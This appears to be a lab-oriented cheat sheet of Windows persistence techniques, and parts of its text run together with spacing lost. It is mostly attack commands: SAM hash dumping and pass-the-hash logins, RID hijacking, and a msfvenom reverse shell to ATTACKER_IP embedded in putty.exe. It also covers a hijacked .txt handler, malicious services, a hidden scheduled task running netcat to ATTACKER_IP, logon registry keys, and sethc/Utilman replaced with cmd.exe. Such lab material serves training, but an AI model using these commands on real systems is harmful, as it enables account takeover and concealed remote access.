# Add to adminnet localgroup administrators oscar42 /add# Add to backup operators. Can read/write any mem location or regnet localgroup "Backup Operators" oscar42 /add# Allow RDP for backup operators net localgroup "Remote Management Users" oscar42 /add# Disable LocalAccountTokenFilterPolicy to allow use of remote adminreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
Conn to group using Evil-WinRM
# Connect to boxevil-winrm-i10.10.0.1-uoscar42-pPassword321# Check Groups whoami/groups# Download for secrets dumpregsavehklm\systemsystem.bakregsavehklm\samsam.bakdownloadsystem.bakdownloadsam.bak# Dump hashes using Impacketpython3.9/opt/impacket/examples/secretsdump.py-samsam.bak-systemsystem.bakLOCAL# Login using admin hash (last part of hashdump)evil-winrm-i10.10.0.1-uAdministrator-H1cea1d7e8899f69e89088c4cb4bbdaa3
The user can read any file in the system, ignoring any DACL in place.
SeRestorePrivilege
The user can write any file in the system, ignoring any DACL in place.
Relative ID (RID) Hijacking
The important bit is the 1010 at the end of the SID for the user oscar42. This is the RID, and we need to change it to the same value as the administrator, 500.
Now we need to modify the HKLM\SAM\SAM\Domains\Account\Users\ key for the user we want to elevate. Convert the RID to HEX to find the user. In this case, 1010 converts to 0x3f2.
Modify the F key to have the admins bytes, 0x1f4 with the byte order reversed.
Backdooring Files
Using MSFVenom
Hijacking File Extensions
File extensions are located at HKLM\Software\Classes\. We can then select a extension. Selecting the .txt extension reveals a link to the class txtfile. We can then change the command ran when opening this file type at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
Backdoor PS1 to run a revshell on notepad launch:
we can then save this script to c:\Windows\system32\backdoor.ps1, and change the reg key to powershell -windowstyle hidden C:\windows\system32\backdoor2.ps1 %1. Opening any .txt file will now execute our payload.
Services
Auto change admin pass
This will create a service that changes the admin password to passwd123 on startup.
MSFVenom
On the attackers machine:
On the target machine:
Service hijacking
Task Scheduler
Hide task
A task can be hidden by deleting its service descriptor (SD). Service descriptors can be viewed at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Next, select the service you created and delete the SD record for it.
# Export current config
secedit /export /cfg config.inf
# Add user to lines in config
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
# Convert modified file to DB and load it to sys
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
# To allow RDP, Open GUI, Add oscar42 user, Allow Full controll permission
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
# You can now connect to Winrm
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
# List RIDs of all users
wmic useraccount get name,sid
>> wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
Guest S-1-5-21-1966530601-3185510712-10604624-501
oscar42 S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount S-1-5-21-1966530601-3185510712-10604624-504
# open regedit as System using PSEXEC
PsExec64.exe -i -s regedit
# Add a backdoor to Putty that executes a payload on run
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe
sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice
# Creates a malicious service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
# After dropping the exe into C:\Windows\
sc.exe create malService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start malService
# List all services. We want to look for a stopped service to avoid
# detection from a AV monitoring services
sc.exe query state=all
# Query for information on a discovered service
sc.exe qc service1
# Change binary path for service
sc.exe config service1 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"
# now you can either wait for the service to start itself, or start it manually with
sc.exe start service1
# Create a task to establish a connection every min
schtasks /create /sc minute /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
# Check if task was created
schtasks /query /tn taskbackdoor
# Programs stored in
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
# Will be ran on startup
# Create a REG_EXPAND_SZ in the registry path with a link to the application
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Add a link to the exe after the comma in UserInit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
# Add a key called "UserInitMprLogonScript" with a path to the exe
HKCU\Environment
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
# Shift 5 times at lockscreen will now pop a shell
takeown /f c:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
# Pressing the accessability settings will now pop a shell
